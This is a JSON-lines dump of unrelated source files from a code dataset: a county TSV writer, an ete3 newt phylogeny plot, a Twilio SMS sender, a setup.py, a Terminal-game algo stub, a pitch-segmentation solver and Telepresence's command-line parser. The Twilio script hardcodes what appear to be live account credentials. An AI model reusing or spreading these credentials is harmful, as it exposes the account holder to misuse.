total=len(self.measureList)\r\n counter=0\r\n for rec in self.measureList:\r\n counter+=1\r\n perc=round(100*(counter/total),0)\r\n if perc%5==0:\r\n #print(str(perc))\r\n pass\r\n if str(rec.date) not in datelist:\r\n datelist.append(str(rec.date))\r\n #print('Ending Date List:'+str(datetime.datetime.now()))\r\n #print('Starting County List:'+str(datetime.datetime.now()))\r\n counter=0\r\n for rec in self.measureList:\r\n counter+=1\r\n perc=round(100*(counter/total),0)\r\n if perc%5==0:\r\n #print(str(perc))\r\n pass\r\n if str(rec.county) not in countylist:\r\n countylist.append(str(rec.county))\r\n #print('Ending County List:'+str(datetime.datetime.now()))\r\n #print('# of Dates '+str(len(datelist)))\r\n #print('# of Zips '+str(len(countylist)))\r\n #print('Starting datelist sort:'+str(datetime.datetime.now()))\r\n datelist.sort()\r\n #print('Ending datelist sort:'+str(datetime.datetime.now()))\r\n #print('Starting countylist sort:'+str(datetime.datetime.now()))\r\n countylist.sort()\r\n #print('Ending contylist sort:'+str(datetime.datetime.now()))\r\n firstline = \"COUNTY\"\r\n #print('Ending datelist sort:'+str(datetime.datetime.now()))\r\n #print('Writing Header:' + str(datetime.datetime.now()))\r\n for dateevent in datelist:\r\n firstline = firstline + \"\\t\" + dateevent\r\n\r\n firstline = firstline + \"\\r\"\r\n location = self.fileLocation+\"\\\\\"+self.measureName+\".txt\"\r\n file = open(location, 'w')\r\n file.write(firstline)\r\n #print('Header Done:' + str(datetime.datetime.now()))\r\n total=len(self.measureList)\r\n counter=0\r\n for currcounty in countylist:\r\n counter+=1\r\n perc=round(100*(counter/total),0)\r\n if perc%5==0:\r\n #print(str(perc))\r\n pass\r\n linestr = currcounty\r\n for currdate in datelist:\r\n valuepts = [measure for measure in self.measureList if (measure.county == currcounty and str(measure.date) == str(currdate))]\r\n for valpt in valuepts:\r\n linestr = linestr + \"\\t\" + str(valpt.value)\r\n linestr = linestr + \"\\r\"\r\n file.write(linestr)\r\n file.close()\r\n\r\nclass Measure:\r\n def __init__(self):\r\n self.date = \"\"\r\n self.value = float(0)\r\n self.county = \"\"\r\n\r\n def setdate(self, indate):\r\n self.date = indate\r\n\r\n def setvalue(self, invalue):\r\n self.value = float(invalue)\r\n\r\n def setcounty(self,incounty):\r\n self.county = incounty\r\n\r\n","sub_path":"fedwriter.py","file_name":"fedwriter.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"163984953","text":"import random\nfrom ete3 import Tree, NodeStyle, TreeStyle, NCBITaxa, faces\n\nncbi = NCBITaxa()\n\nmy_tree = ncbi.get_topology([54263, 8324, 8323, 8327, 8325, 57571, 323754])\n\nts = TreeStyle()\nts.show_leaf_name = True\n\nfor n in my_tree.traverse():\n nstyle = NodeStyle()\n nstyle[\"fgcolor\"] = \"yellow\"\n nstyle[\"size\"] = 10\n n.set_style(nstyle)\n\nmy_tree.img_style[\"size\"] = 20\nmy_tree.img_style[\"fgcolor\"] = \"green\"\n\ncode_name = {\n \"54263\":\"Ichthyosaura alpestris\",\n \"8324\":\"Lissotriton vulgaris\",\n \"8323\":\"Triturus cristatus\",\n \"8327\":\"Triturus dobrogicus\",\n \"8325\":\"Triturus karelinii \",\n \"57571\":\"Salamandra salamandra \", \n \"323754\":\"Lissotriton montandoni\"\n }\n\ndef mylayout(node):\n\n if node.is_leaf():\n longNameFace = faces.TextFace(code_name[node.name], fsize=15, fgcolor=\"green\")\n faces.add_face_to_node(longNameFace, node, column=0)\n\nts = TreeStyle()\nts.layout_fn = mylayout\nts.scale = 100\nmy_tree.show(tree_style=ts)","sub_path":"names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"174036741","text":"# Download the helper library from https://www.twilio.com/docs/python/install\r\nfrom twilio.rest import Client\r\n\r\n\r\n# Your Account Sid and Auth Token from twilio.com/console\r\n# DANGER! This is insecure. See http://twil.io/secure\r\naccount_sid = 'AC0d982082455eff6334adaba25a77d04f'\r\nauth_token = '3b3e2361f7fdb0ac94e4ba9d9fe30d56'\r\nclient = Client(account_sid, auth_token)\r\n\r\nmessage = client.messages.create(\r\n body='This is the ship that made the Kessel Run in fourteen parsecs?',\r\n from_='+17738773065',\r\n to='+918056054049'\r\n )\r\n\r\nprint(message)","sub_path":"twilio_sms.py","file_name":"twilio_sms.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"277041477","text":"from setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nsetup(\n name='cpapi',\n version='2.1.0',\n description='Check Point API Web Interface',\n url='https://github.com/themadhatterz/cpapi',\n author='Joshua (Mad) Hatter',\n author_email='jhatter@themadhatter.org',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n keywords='CheckPoint Check_Point Check Point API Wrapper',\n packages=find_packages(exclude=['tests', 'dist']),\n install_requires=['flask>=1.0.0,<2.0.0', 'flask_login>=0.4.0,<1.0.0', 'requests>=2.18.0<3.0.0', 'cpapilib>=0.1.8,<1.0.0'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"489019751","text":"import gamelib\r\nimport random\r\nimport math\r\nimport warnings\r\nfrom sys import maxsize\r\nimport queue\r\nimport pickle\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom network import Network\r\n\r\n\"\"\"\r\nMost of the algo code you write will be in this file unless you create new\r\nmodules yourself. Start by modifying the 'on_turn' function.\r\n\r\nAdvanced strategy tips:\r\nAdditional functions are made available by importing the AdvancedGameState\r\nclass from gamelib/advanced.py as a replcement for the regular GameState class\r\nin game.py.\r\n\r\nYou can analyze action frames by modifying algocore.py.\r\n\r\nThe GameState.map object can be manually manipulated to create hypothetical\r\nboard states. Though, we recommended making a copy of the map to preserve\r\nthe actual current map state.\r\n\"\"\"\r\n\r\nclass AlgoStrategy(gamelib.AlgoCore):\r\n def __init__(self):\r\n super().__init__()\r\n random.seed()\r\n file_name = 'network1.pickle'\r\n\r\n def on_game_start(self, config):\r\n \"\"\"\r\n Read in config and perform any initial setup here\r\n \"\"\"\r\n gamelib.debug_write('Configuring your custom algo strategy...')\r\n self.config = config\r\n global FILTER, ENCRYPTOR, DESTRUCTOR, PING, EMP, SCRAMBLER\r\n FILTER = config[\"unitInformation\"][0][\"shorthand\"]\r\n ENCRYPTOR = config[\"unitInformation\"][1][\"shorthand\"]\r\n DESTRUCTOR = config[\"unitInformation\"][2][\"shorthand\"]\r\n PING = config[\"unitInformation\"][3][\"shorthand\"]\r\n EMP = config[\"unitInformation\"][4][\"shorthand\"]\r\n SCRAMBLER = config[\"unitInformation\"][5][\"shorthand\"]\r\n\r\n # Checks if network exist otherwise creates new one\r\n\r\n network = Network()\r\n\r\n network.load_data(\"falseName\")\r\n\r\n\r\n def on_turn(self, turn_state):\r\n \"\"\"\r\n This function is called every turn with the game state wrapper as\r\n an argument. The wrapper stores the state of the arena and has methods\r\n for querying its state, allocating your current resources as planned\r\n unit deployments, and transmitting your intended deployments to the\r\n game engine.\r\n \"\"\"\r\n game_state = gamelib.GameState(self.config, turn_state)\r\n gamelib.debug_write('Performing turn {} of your custom algo strategy'.format(game_state.turn_number))\r\n #game_state.suppress_warnings(True) #Uncomment this line to suppress warnings.\r\n\r\n self.starter_strategy(game_state)\r\n\r\n game_state.submit_turn()\r\n\r\n def strategy(self):\r\n possible_game_state = {}\r\n","sub_path":"algo-v1.1/algo_strategy.py","file_name":"algo_strategy.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440736213","text":"import sys \n\n\nname = sys.argv[1]\nwidth = int(sys.argv[2])\nheight = int(sys.argv[3])\nprint(width)\nprint(height)\nfirst =''\n\nfirst += name;\t\t\t\t\t\t# pierwsza linia\nname_len = len(name)\nfor num in range(0,width-1):\n\tif num % 2 == 0: \n\t\tfirst += name[name_len-2::-1]\n\telse :\n\t\tfirst += name[1::]\nprint (first)\n\n\n\n\ni=1\nwhile(i 0)\n\n def test_dimensions(self):\n # test that the correct midpoint of width is found\n width = self.lamb_sheet.get_width()\n height = self.lamb_sheet.get_height()\n midpoint = self.lamb_sheet.get_midpoint()\n\n self.assertTrue((width == self.REAL_WIDTH),\n (\"Width Found: \" + str(width) + \n \", expected: \" + str(self.REAL_WIDTH)))\n self.assertTrue((height == self.REAL_HEIGHT),\n (\"Height Found: \" + str(height) + \n \", expected: \" + str(self.REAL_HEIGHT)))\n self.assertTrue((midpoint == self.REAL_MIDPOINT),\n (\"Midpoint Found: \" + str(midpoint) + \n \", expected: \" + str(self.REAL_MIDPOINT)))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/tests/sheet_image_test.py","file_name":"sheet_image_test.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"178910557","text":"import numpy as np\n\nFRAME_SIZE = 0.016\nTHRESHOLD = 15\n\ndef trim_data(pitch_set):\n trimmed_set = []\n new_set = []\n last_zero = True\n for pair in pitch_set:\n if pair[1] > 0:\n new_set.append(pair)\n last_zero = False\n elif last_zero == False:\n trimmed_set.append(new_set)\n new_set = []\n last_zero = True\n return trimmed_set\n\ndef solve(pitch_set):\n data_len = len(pitch_set)\n err_table = []\n\n # init the table O(N)\n first_row = [0 for _ in range(data_len)]\n note = np.array([pitch_set[0][1]])\n for i in range(1,data_len):\n note = np.append(note, pitch_set[i][1])\n first_row[i] = np.sum(np.abs(note - np.median(note)))\n err_table.append(first_row)\n\n predict_note = int(round(data_len * 1))\n \n '''\n print(f'data_len: {data_len}, predict_note: {predict_note}')\n print(\"finish initializing\")\n '''\n \n # fill the table O(NM)\n for note_idx in range(1,predict_note):\n #print(f'index {note_idx}')\n row = [0 for _ in range(data_len)]\n cur_note = np.array([0])\n row[note_idx-1] = 100000 # a large number\n cnt = 1\n for i in range(note_idx+1,data_len):\n temp = np.append(cur_note, pitch_set[i][1])\n can1 = np.sum(np.abs(temp - np.median(temp)))\n can2 = err_table[note_idx-1][i-1]\n if can1 == can2:\n if cnt < 3:\n cur_note = temp\n row[i] = can1 + 0.01\n cnt += 1\n else:\n row[i] = can2\n cnt = 1\n elif can1 < can2:\n if cnt > 8 and abs(can1-can2) < THRESHOLD:\n row[i] = can2\n cnt = 1\n else:\n cur_note = temp\n row[i] = can1\n cnt += 1\n else:\n if cnt < 3 and abs(can1 - can2) < THRESHOLD:\n cur_note = temp\n row[i] = can1\n cnt += 1\n else :\n row[i] = can2\n cnt = 1\n err_table.append(row)\n\n #print(\"backtracking\")\n # backtracking\n ret = []\n\n\n cur_pos = data_len-1\n cur_note = predict_note-1\n \n this_note = [0, pitch_set[cur_pos][0]+FRAME_SIZE , 0] # onset offset pitch\n note_pitch = [pitch_set[cur_pos][1]]\n pitch_cnt = 1\n\n # O(N+M)\n while cur_pos > 0 and cur_note > 0:\n if err_table[cur_note][cur_pos] == err_table[cur_note-1][cur_pos-1]:\n this_note[0] = pitch_set[cur_pos][0]-FRAME_SIZE\n this_note[2] = np.median(np.array(note_pitch))\n # print(f'this_note is {this_note}')\n if this_note[2] < 35:\n continue\n ret.append(this_note)\n this_note = [0, pitch_set[cur_pos-1][0]+FRAME_SIZE, 0] # onset offset pitch\n note_pitch = [pitch_set[cur_pos-1][1]]\n cur_pos -= 1\n cur_note -= 1\n pitch_cnt = 1\n else :\n note_pitch.append(pitch_set[cur_pos-1][1])\n pitch_cnt += 1\n cur_pos -= 1\n return ret \n\ndef process(pitch_set):\n res = []\n dat = trim_data(pitch_set)\n '''\n subset_cnt = 0\n '''\n\n for subset in dat:\n '''\n print(f'subset no: {subset_cnt}')\n subset_cnt += 1\n '''\n ans = solve(subset) \n res += ans\n res.sort()\n toRemove = []\n for i in range(1,len(res)):\n if abs(res[i][2] - res[i-1][2]) <= 1 and abs(res[i][0] - res[i-1][1]) < 3*FRAME_SIZE:\n # print(res[i][0], res[i-1][0])\n res[i][0] = res[i-1][0]\n res[i][2] = int(round( (res[i][2] + res[i-1][2])/2 ))\n toRemove += [i-1]\n for idx in toRemove[::-1]:\n res.remove(res[idx])\n return res\n \n","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"651192199","text":"# Copyright 2018 Datawire. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport sys\nimport webbrowser\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom subprocess import check_output\nfrom traceback import format_exc\nfrom typing import Any, Dict, Iterator, List, Optional, Set, Tuple, Union\nfrom urllib.parse import quote_plus\n\nimport telepresence\nfrom telepresence.runner import BackgroundProcessCrash, Runner\nfrom telepresence.utilities import dumb_print, random_name\n\n\nclass PortMapping(object):\n \"\"\"Maps local ports to listen to remote exposed ports.\"\"\"\n def __init__(self) -> None:\n self._mapping = {} # type: Dict[int,int]\n\n @classmethod\n def parse(cls, port_strings: List[str]) -> \"PortMapping\":\n \"\"\"Parse list of 'port' or 'local_port:remote_port' to PortMapping.\"\"\"\n result = PortMapping()\n for port_string in port_strings:\n if \":\" in port_string:\n local_port, remote_port = map(int, port_string.split(\":\"))\n else:\n local_port, remote_port = int(port_string), int(port_string)\n result._mapping[local_port] = remote_port\n return result\n\n def merge_automatic_ports(self, ports: List[int]) -> None:\n \"\"\"\n Merge a list of ports to the existing ones.\n\n The existing ones will win if the port is already there.\n \"\"\"\n remote = self.remote()\n for port in ports:\n if port in remote:\n continue\n self._mapping[port] = port\n\n def remote(self) -> Set[int]:\n \"\"\"Return set of remote ports.\"\"\"\n return set(self._mapping.values())\n\n def local_to_remote(self) -> Set[Tuple[int, int]]:\n \"\"\"Return set of pairs of local, remote ports.\"\"\"\n return set(self._mapping.items())\n\n def has_privileged_ports(self) -> bool:\n \"\"\"\n Return true if any remote port is privileged (< 1024)\n \"\"\"\n return any([p < 1024 for p in self.remote()])\n\n\ndef safe_output(args: List[str]) -> str:\n \"\"\"\n Capture output from a command but try to avoid crashing\n :param args: Command to run\n :return: Output from the command\n \"\"\"\n try:\n return str(check_output(args), \"utf-8\").strip().replace(\"\\n\", \" // \")\n except Exception as e:\n return \"(error: {})\".format(e)\n\n\ndef report_crash(error: Any, log_path: str, logs: str) -> None:\n print(\n \"\\nLooks like there's a bug in our code. Sorry about that!\\n\\n\" +\n error + \"\\n\"\n )\n if log_path != \"-\":\n log_ref = \" (see {} for the complete logs):\".format(log_path)\n else:\n log_ref = \"\"\n if \"\\n\" in logs:\n print(\n \"Here are the last few lines of the logfile\" + log_ref + \"\\n\\n\" +\n \"\\n\".join(logs.splitlines()[-12:]) + \"\\n\"\n )\n report = \"no\"\n if sys.stdout.isatty():\n message = (\n \"Would you like to file an issue in our issue tracker?\"\n \" You'll be able to review and edit before anything is\"\n \" posted to the public.\"\n \" We'd really appreciate the help improving our product. [Y/n]: \"\n )\n try:\n report = input(message).lower()[:1]\n except EOFError:\n print(\"(EOF)\")\n if report in (\"y\", \"\"):\n url = \"https://github.com/datawire/telepresence/issues/new?body=\"\n body = quote_plus(\n BUG_REPORT_TEMPLATE.format(\n sys.argv,\n telepresence.__version__,\n sys.version,\n safe_output([\"kubectl\", \"version\", \"--short\"]),\n safe_output([\"oc\", \"version\"]),\n safe_output([\"uname\", \"-a\"]),\n error,\n logs[-1000:],\n )[:4000]\n ) # Overly long URLs won't work\n webbrowser.open_new(url + body)\n\n\n@contextmanager\ndef crash_reporting(runner: Optional[Runner] = None) -> Iterator[None]:\n \"\"\"\n Decorator that catches unexpected errors\n \"\"\"\n try:\n yield\n except KeyboardInterrupt:\n if runner is not None:\n show = runner.show\n else:\n show = dumb_print\n show(\"Keyboard interrupt (Ctrl-C/Ctrl-Break) pressed\")\n raise SystemExit(0)\n except Exception as exc:\n if isinstance(exc, BackgroundProcessCrash):\n error = exc.details\n else:\n error = format_exc()\n logs = \"Not available\"\n log_path = \"-\"\n if runner is not None:\n logs = runner.read_logs()\n log_path = runner.logfile_path\n runner.write(\"CRASH: {}\".format(exc))\n runner.write(error)\n runner.write(\"(calling crash reporter...)\")\n report_crash(error, log_path, logs)\n raise SystemExit(1)\n\n\ndef path_or_bool(value: str) -> Union[Path, bool]:\n \"\"\"Parse value as a Path or a boolean\"\"\"\n path = Path(value)\n if path.is_absolute():\n return path\n value = value.lower()\n if value in (\"true\", \"on\", \"yes\", \"1\"):\n return True\n if value in (\"false\", \"off\", \"no\", \"0\"):\n return False\n raise argparse.ArgumentTypeError(\n \"Value must be true, false, or an absolute filesystem path\"\n )\n\n\ndef absolute_path(value: str) -> Path:\n \"\"\"Parse value as a Path or a boolean\"\"\"\n path = Path(value)\n if path.is_absolute():\n return path\n\n raise argparse.ArgumentTypeError(\n \"Value must be an absolute filesystem path\"\n )\n\n\ndef parse_args(in_args: Optional[List[str]] = None) -> argparse.Namespace:\n \"\"\"Create a new ArgumentParser and parse sys.argv.\"\"\"\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n allow_abbrev=False, # can make adding changes not backwards compatible\n description=(\n \"Telepresence: local development proxied to a remote Kubernetes \"\n \"cluster.\\n\\n\"\n \"Documentation: https://telepresence.io\\n\"\n \"Real-time help: https://d6e.co/slack\\n\"\n \"Issue tracker: https://github.com/datawire/telepresence/issues\\n\"\n \"\\n\" + HELP_EXAMPLES + \"\\n\\n\"\n )\n )\n parser.add_argument(\n '--version', action='version', version=telepresence.__version__\n )\n parser.add_argument(\n \"--verbose\",\n action='store_true',\n help=\"Enables verbose logging for troubleshooting.\"\n )\n parser.add_argument(\n \"--logfile\",\n default=\"./telepresence.log\",\n help=(\n \"The path to write logs to. '-' means stdout, \"\n \"default is './telepresence.log'.\"\n )\n )\n parser.add_argument(\n \"--method\",\n \"-m\",\n choices=[\"inject-tcp\", \"vpn-tcp\", \"container\"],\n help=(\n \"'inject-tcp': inject process-specific shared \"\n \"library that proxies TCP to the remote cluster.\\n\"\n \"'vpn-tcp': all local processes can route TCP \"\n \"traffic to the remote cluster. Requires root.\\n\"\n \"'container': used with --docker-run.\\n\"\n \"\\n\"\n \"Default is 'vpn-tcp', or 'container' when --docker-run is used.\\n\"\n \"\\nFor more details see \"\n \"https://telepresence.io/reference/methods.html\"\n )\n )\n parser.add_argument(\n \"--docker-host\",\n dest=\"docker_host\",\n metavar=\"HOSTNAME\",\n help=(\n \"If you are using --method=container within a docker container \"\n \"with a remote docker daemon, you can set a host name or ip \"\n \"address to the host machine's localhost. \\n\"\n \"Example '--docker-host docker.for.mac.localhost'\"\n )\n )\n group_deployment = parser.add_mutually_exclusive_group()\n group_deployment.add_argument(\n '--new-deployment',\n \"-n\",\n metavar=\"DEPLOYMENT_NAME\",\n dest=\"new_deployment\",\n help=(\n \"Create a new Deployment in Kubernetes where the \"\n \"datawire/telepresence-k8s image will run. It will be deleted \"\n \"on exit. If no deployment option is specified this will be \"\n \" used by default, with a randomly generated name.\"\n )\n )\n group_deployment.add_argument(\n \"--swap-deployment\",\n \"-s\",\n dest=\"swap_deployment\",\n metavar=\"DEPLOYMENT_NAME[:CONTAINER]\",\n help=(\n \"Swap out an existing deployment with the Telepresence proxy, \"\n \"swap back on exit. If there are multiple containers in the pod \"\n \"then add the optional container name to indicate which container\"\n \" to use.\"\n )\n )\n group_deployment.add_argument(\n \"--deployment\",\n \"-d\",\n metavar=\"EXISTING_DEPLOYMENT_NAME\",\n help=(\n \"The name of an existing Kubernetes Deployment where the \" +\n \"datawire/telepresence-k8s image is already running.\"\n )\n )\n parser.add_argument(\n \"--context\",\n default=None,\n help=(\n \"The Kubernetes context to use. Defaults to current kubectl\"\n \" context.\"\n )\n )\n parser.add_argument(\n \"--namespace\",\n default=None,\n help=(\n \"The Kubernetes namespace to use. Defaults to kubectl's default\"\n \" for the current context, which is usually 'default'.\"\n )\n )\n parser.add_argument(\n \"--serviceaccount\",\n dest=\"service_account\",\n default=None,\n help=(\n \"The Kubernetes service account to use. Sets the value for a new\"\n \" deployment or overrides the value for a swapped deployment.\"\n )\n )\n parser.add_argument(\n \"--expose\",\n action='append',\n metavar=\"PORT[:REMOTE_PORT]\",\n default=[],\n help=(\n \"Port number that will be exposed to Kubernetes in the Deployment.\"\n \" Should match port exposed in the existing Deployment if using \"\n \"--deployment or --swap-deployment. By default local port and \"\n \"remote port are the same; if you want to listen on port 8080 \"\n \"locally but be exposed as port 80 in Kubernetes you can do \"\n \"'--expose 8080:80'.\"\n )\n )\n parser.add_argument(\n \"--to-pod\",\n action=\"append\",\n metavar=\"PORT\",\n type=int,\n default=[],\n help=(\n \"Access localhost:PORT on other containers in the swapped \"\n \"deployment's pod from your host or local container. For example, \"\n \"use this to reach proxy/helper containers in the pod with \"\n \"--swap-deployment.\"\n )\n )\n parser.add_argument(\n \"--from-pod\",\n action=\"append\",\n metavar=\"PORT\",\n type=int,\n default=[],\n help=(\n \"Allow access to localhost:PORT on your host or local container \"\n \"from other containers in the swapped deployment's pod. For \"\n \"example, use this to let an adapter container forward requests \"\n \"to your swapped deployment.\"\n )\n )\n parser.add_argument(\n \"--container-to-host\",\n action=\"append\",\n metavar=\"CONTAINER_PORT[:HOST_PORT]\",\n default=[],\n help=(\n \"For the container method, listen on localhost:CONTAINER_PORT in\"\n \" the container and forward connections to localhost:HOST_PORT on\"\n \" the host running Telepresence. Useful for allowing code running\"\n \" in the container to connect to an IDE or debugger running on the\"\n \" host.\"\n )\n )\n parser.add_argument(\n \"--also-proxy\",\n metavar=\"CLOUD_HOSTNAME\",\n dest=\"also_proxy\",\n action='append',\n default=[],\n help=(\n \"If you are using --method=vpn-tcp, use this to add additional \"\n \"remote IPs, IP ranges, or hostnames to proxy. Kubernetes service \"\n \"and pods are proxied automatically, so you only need to list \"\n \"cloud resources, e.g. the hostname of a AWS RDS. \"\n \"When using --method=inject-tcp \"\n \"this option is unnecessary as all outgoing communication in \"\n \"the run subprocess will be proxied.\"\n )\n )\n parser.add_argument(\n \"--exclude-proxy\",\n metavar=\"CIDR\",\n dest=\"exclude_proxy\",\n action='append',\n default=[],\n help=(\n \"If you are using --method=vpn-tcp or --method=container, use \"\n \"this to exclude additional remote IPs, and IP ranges to proxy. \"\n \"Kubernetes service and pods are proxied automatically, so you \"\n \"only need to list cloud resources, e.g. the hostname of a AWS \"\n \"RDS. When using --method=inject-tcp \"\n \"this option is unnecessary as all outgoing communication in \"\n \"the run subprocess will be proxied.\"\n )\n )\n parser.add_argument(\n \"--host-ip\",\n metavar=\"IPADDRESS\",\n dest=\"host_ip\",\n help=(\n \"If you are using --method=container, with a remote docker daemon \"\n \"(one that is running on the host machine).\"\n )\n )\n parser.add_argument(\n \"--local-cluster\",\n action='store_true',\n help=(\n \"If you are using --method=vpn-tcp with a local cluster (one that\"\n \" is running on the same computer as Telepresence) and you\"\n \" experience DNS loops or loss of Internet connectivity while\"\n \" Telepresence is running, use this flag to enable an internal\"\n \" workaround that may help.\"\n )\n )\n\n mount_group = parser.add_mutually_exclusive_group()\n mount_group.add_argument(\n \"--docker-mount\",\n type=absolute_path,\n metavar=\"PATH\",\n dest=\"docker_mount\",\n default=None,\n help=(\n \"The absolute path for the root directory where volumes will be \"\n \"mounted, $TELEPRESENCE_ROOT. \"\n \"Requires --method container.\"\n )\n )\n\n mount_group.add_argument(\n \"--mount\",\n type=path_or_bool,\n metavar=\"PATH_OR_BOOLEAN\",\n dest=\"mount\",\n default=True,\n help=(\n \"The absolute path for the root directory where volumes will be \"\n \"mounted, $TELEPRESENCE_ROOT. \"\n \"Use \\\"true\\\" to have Telepresence pick a random mount point \"\n \"under /tmp (default). \"\n \"Use \\\"false\\\" to disable filesystem mounting entirely.\"\n )\n )\n\n parser.add_argument(\n \"--env-json\",\n metavar=\"FILENAME\",\n default=None,\n help=\"Also emit the remote environment to a file as a JSON blob.\"\n )\n\n parser.add_argument(\n \"--env-file\",\n metavar=\"FILENAME\",\n default=None,\n help=(\n \"Also emit the remote environment to an env file in Docker \"\n \"Compose format. \"\n \"See https://docs.docker.com/compose/env-file/ for more \"\n \"information on the limitations of this format.\"\n )\n )\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n \"--run-shell\",\n dest=\"runshell\",\n action=\"store_true\",\n help=\"Run a local shell that will be proxied to/from Kubernetes.\",\n )\n group.add_argument(\n \"--run\",\n metavar=(\"COMMAND\", \"ARG\"),\n dest=\"run\",\n nargs=argparse.REMAINDER,\n help=(\n \"Run the specified command arguments, e.g. \"\n \"'--run python myapp.py'.\"\n )\n )\n group.add_argument(\n \"--docker-run\",\n metavar=\"DOCKER_RUN_ARG\",\n dest=\"docker_run\",\n nargs=argparse.REMAINDER,\n help=(\n \"Run a Docker container, by passing the arguments to 'docker run',\"\n \" e.g. '--docker-run -i -t ubuntu:16.04 /bin/bash'. \"\n \"Requires --method container.\"\n )\n )\n args = parser.parse_args(in_args)\n\n # Fill in defaults:\n if args.method is None:\n if args.docker_run is not None:\n args.method = \"container\"\n else:\n args.method = \"vpn-tcp\"\n\n if args.deployment is not None:\n args.operation = \"deployment\"\n args.deployment_arg = args.deployment\n elif args.swap_deployment is not None:\n args.operation = \"swap_deployment\"\n args.deployment_arg = args.swap_deployment\n elif args.new_deployment is not None:\n args.operation = \"new_deployment\"\n args.deployment_arg = args.new_deployment\n else:\n args.operation = \"new_deployment\"\n args.new_deployment = random_name()\n args.deployment_arg = args.new_deployment\n\n if args.docker_mount:\n args.mount = False\n\n if args.method == \"container\" and args.docker_run is None:\n raise SystemExit(\n \"'--docker-run' is required when using '--method container'.\"\n )\n if args.docker_run is not None and args.method != \"container\":\n raise SystemExit(\n \"'--method container' is required when using '--docker-run'.\"\n )\n\n if args.docker_mount is not None and args.method != \"container\":\n raise SystemExit(\n \"'--method container' is required when using '--docker-mount'.\"\n )\n\n args.expose = PortMapping.parse(args.expose)\n args.container_to_host = PortMapping.parse(args.container_to_host)\n return args\n\n\nHELP_EXAMPLES = \"\"\"\\\n== Examples ==\n\nSend a HTTP query to Kubernetes Service called 'myservice' listening on port \\\n8080:\n\n$ telepresence --run curl http://myservice:8080/\n\nReplace an existing Deployment 'myserver' listening on port 9090 with a local \\\nprocess listening on port 9090:\n\n$ telepresence --swap-deployment myserver --expose 9090 \\\n --run python3 -m http.server 9090\n\nUse a different local port than the remote port:\n\n$ telepresence --swap-deployment myserver --expose 9090:80 \\\n --run python3 -m http.server 9090\n\nRun a Docker container instead of a local process:\n\n$ telepresence --swap-deployment myserver --expose 80 \\\n --docker-run -i -t nginx:latest\n\n\n== Detailed usage ==\n\"\"\"\n\nBUG_REPORT_TEMPLATE = u\"\"\"\\\n### What were you trying to do?\n\n(please tell us)\n\n### What did you expect to happen?\n\n(please tell us)\n\n### What happened instead?\n\n(please tell us - the traceback is automatically included, see below.\nuse https://gist.github.com to pass along full telepresence.log)\n\n### Automatically included information\n\nCommand line: `{}`\nVersion: `{}`\nPython version: `{}`\nkubectl version: `{}`\noc version: `{}`\nOS: `{}`\n\n```\n{}\n```\n\nLogs:\n\n```\n{}\n```\n\"\"\"\n","sub_path":"telepresence/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":19122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"346141880","text":"import cv2 \nimport tensorflow as tf\nimport pandas as pd\nimport pickle\nman_classes = pickle.load(open(\"man-list.pickle\", \"rb\"))\nmodel = tf.keras.models.load_model(\"64x3-CNN.model\")\n\ndef prepare(filepath):\n img_height = 65\n img_width = 100\n img_array = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE)\n img_array = img_array/255.0\n new_array = cv2.resize(img_array, (img_height, img_width))\n return new_array.reshape(-1, img_height, img_width, 1)\n\n\ndef main():\n global model\n prediction = model.predict([prepare('img/image.jpg')])\n result = man_classes[list(prediction[0]).index(max(prediction[0]))]\n return result\n\n\n\n\n","sub_path":"neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"452940806","text":"# vim:set fileencoding=utf-8 ft=python ts=8 sw=4 sts=4 et cindent:\n\n# dhcprequestor.py -- Requests an IP address on behalf of a given MAC address.\n#\n# Copyright © 2010 Fabian Knittel \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport random\nimport time\nimport logging\n\nfrom typing import Dict, Optional, Tuple, List, Callable, Iterable, Any\nfrom 